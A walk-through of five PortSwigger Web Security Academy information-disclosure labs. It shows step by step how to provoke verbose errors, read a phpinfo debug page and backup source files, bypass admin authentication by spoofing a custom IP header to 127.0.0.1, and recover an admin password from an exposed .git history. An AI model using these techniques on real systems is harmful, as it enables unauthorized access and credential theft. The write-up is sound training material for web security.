Walk-through of the Information disclosure lab on PortSwigger Web Security Academy.
- Apprentice – Information disclosure in error messages
- Apprentice – Information disclosure on debug page
- Apprentice – Source code disclosure via backup files
- Apprentice – Authentication bypass via information disclosure
- Practitioner – Information disclosure in version control history
Apprentice – Information disclosure in error messages
This lab’s verbose error messages reveal that it is using a vulnerable version of a third-party framework. To solve the lab, obtain and submit the version number of this framework.
Click on View product.
GET /product?productId=1 HTTP/1.1
...
- Send the request to the Repeater.
- Change the productId to generate an error.
GET /product?productId=1' HTTP/1.1
...
HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 1641
Internal Server Error: java.lang.NumberFormatException: For input string: "1'"
...
Apache Struts 2 2.3.31
Click on Submit solution and enter 2 2.3.31.
Apprentice – Information disclosure on debug page
This lab contains a debug page that discloses sensitive information about the application. To solve the lab, obtain and submit the SECRET_KEY environment variable.
Inspect request from the Home page. There is a comment about a PHP debug page.
<!-- <a href=/cgi-bin/phpinfo.php>Debug</a> -->
Access the debug page.
https://<LAB ID>.web-security-academy.net/cgi-bin/phpinfo.php
Inspect the server response.
<tr><td class="e">SECRET_KEY </td><td class="v">r0itpc9iex7wez2l1n934azn3m2e4qcd </td></tr>
Click on Submit solution and enter r0itpc9iex7wez2l1n934azn3m2e4qcd.
Apprentice – Source code disclosure via backup files
This lab leaks its source code via backup files in a hidden directory. To solve the lab, identify and submit the database password, which is hard-coded in the leaked source code.
Enter /robots.txt in the URL.
GET /robots.txt HTTP/1.1
...
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Connection: close
Content-Length: 32
User-agent: *
Disallow: /backup
We find a /backup directory. Access it.
GET /backup HTTP/1.1
...
<a href='/backup/ProductTemplate.java.bak'>ProductTemplate.java.bak</a>
We find a backup file. Access it.
GET /backup/ProductTemplate.java.bak HTTP/1.1
...
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Connection: close
Content-Length: 1667
...
ConnectionBuilder connectionBuilder = ConnectionBuilder.from(
"org.postgresql.Driver",
"postgresql",
"localhost",
5432,
"postgres",
"postgres",
"j63l99g732vpq83ftvcmani8it28veiw"
Click on Submit solution and enter j63l99g732vpq83ftvcmani8it28veiw.
Apprentice – Authentication bypass via information disclosure
This lab’s administration interface has an authentication bypass vulnerability, but it is impractical to exploit without knowledge of a custom HTTP header used by the front-end. To solve the lab, obtain the header name then use it to bypass the lab’s authentication. Access the admin interface and delete Carlos’s account.
Send the Home page request to the Repeater module. Change the method to TRACE.
TRACE / HTTP/1.1
...
HTTP/1.1 200 OK
Content-Type: message/http
Connection: close
Content-Length: 851
...
X-Custom-IP-Authorization: 173.179.81.119
Try to access /admin
GET /admin HTTP/1.1
...
X-Custom-IP-Authorization: 173.179.81.119
HTTP/1.1 401 Unauthorized
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 2348
...
Admin interface only available to local users
...
Change the X-Custom-IP-Authorization header to the localhost 127.0.0.1.
GET /admin HTTP/1.1
...
X-Custom-IP-Authorization: 127.0.0.1
...
<a href="/admin/delete?username=carlos">Delete</a>
...
Delete user carlos to solve the lab.
GET /admin/delete?username=carlos HTTP/1.1
...
X-Custom-IP-Authorization: 127.0.0.1
Practitioner – Information disclosure in version control history
This lab discloses sensitive information via its version control history. To solve the lab, obtain the password for the administrator user then log in and delete Carlos’s account.
Access the /.git directory.
https://<LAB ID>.web-security-academy.net/.git
<a href='/.git/branches/'><branches></a></td><td></td></tr>
<tr><td><a href='/.git/description'>description</a></td><td>73B</td></tr>
<tr><td><a href='/.git/hooks/'><hooks></a></td><td></td></tr>
<tr><td><a href='/.git/info/'><info></a></td><td></td></tr>
<tr><td><a href='/.git/refs/'><refs></a></td><td></td></tr>
<tr><td><a href='/.git/HEAD'>HEAD</a></td><td>23B</td></tr>
<tr><td><a href='/.git/config'>config</a></td><td>152B</td></tr>
<tr><td><a href='/.git/objects/'><objects></a></td><td></td></tr>
<tr><td><a href='/.git/index'>index</a></td><td>225B</td></tr>
<tr><td><a href='/.git/COMMIT_EDITMSG'>COMMIT_EDITMSG</a></td><td>34B</td></tr>
<tr><td><a href='/.git/logs/'><logs></a>
On Kali Linux, download the directory.
wget -r https://<LAB ID>.web-security-academy.net/.git
Go to the .git directory.
cd <LAB ID>.web-security-academy.net/.git
Show the commit log.
git log
commit 3be36cf803c6c3dabae04d58cd4cb2c2ab0f84c7 (HEAD -> master)
Author: Carlos Montoya <carlos@evil-user.net>
Date: Tue Jun 23 14:05:07 2020 +0000
Remove admin password from config
commit 1b48fa39f917e90a9f003ec267d958ca873a678d
Author: Carlos Montoya <carlos@evil-user.net>
Date: Mon Jun 22 16:23:42 2020 +0000
Add skeleton admin panel
Show information from commit 3be36cf803c6c3dabae04d58cd4cb2c2ab0f84c7.
git show 3be36cf803c6c3dabae04d58cd4cb2c2ab0f84c7
ommit 3be36cf803c6c3dabae04d58cd4cb2c2ab0f84c7 (HEAD -> master)
Author: Carlos Montoya <carlos@evil-user.net>
Date: Tue Jun 23 14:05:07 2020 +0000
Remove admin password from config
diff --git a/admin.conf b/admin.conf
index 8d49360..21d23f1 100644
--- a/admin.conf
+++ b/admin.conf
@@ -1 +1 @@
-ADMIN_PASSWORD=j7jtjgvlzihjxcr3g058
+ADMIN_PASSWORD=env('ADMIN_PASSWORD')
We get the administrator password “j7jtjgvlzihjxcr3g058”.
- Click on My account and log in with credentials administrator/j7jtjgvlzihjxcr3g058.
- Click on Admin panel.
- Delete user carlos to solve the lab.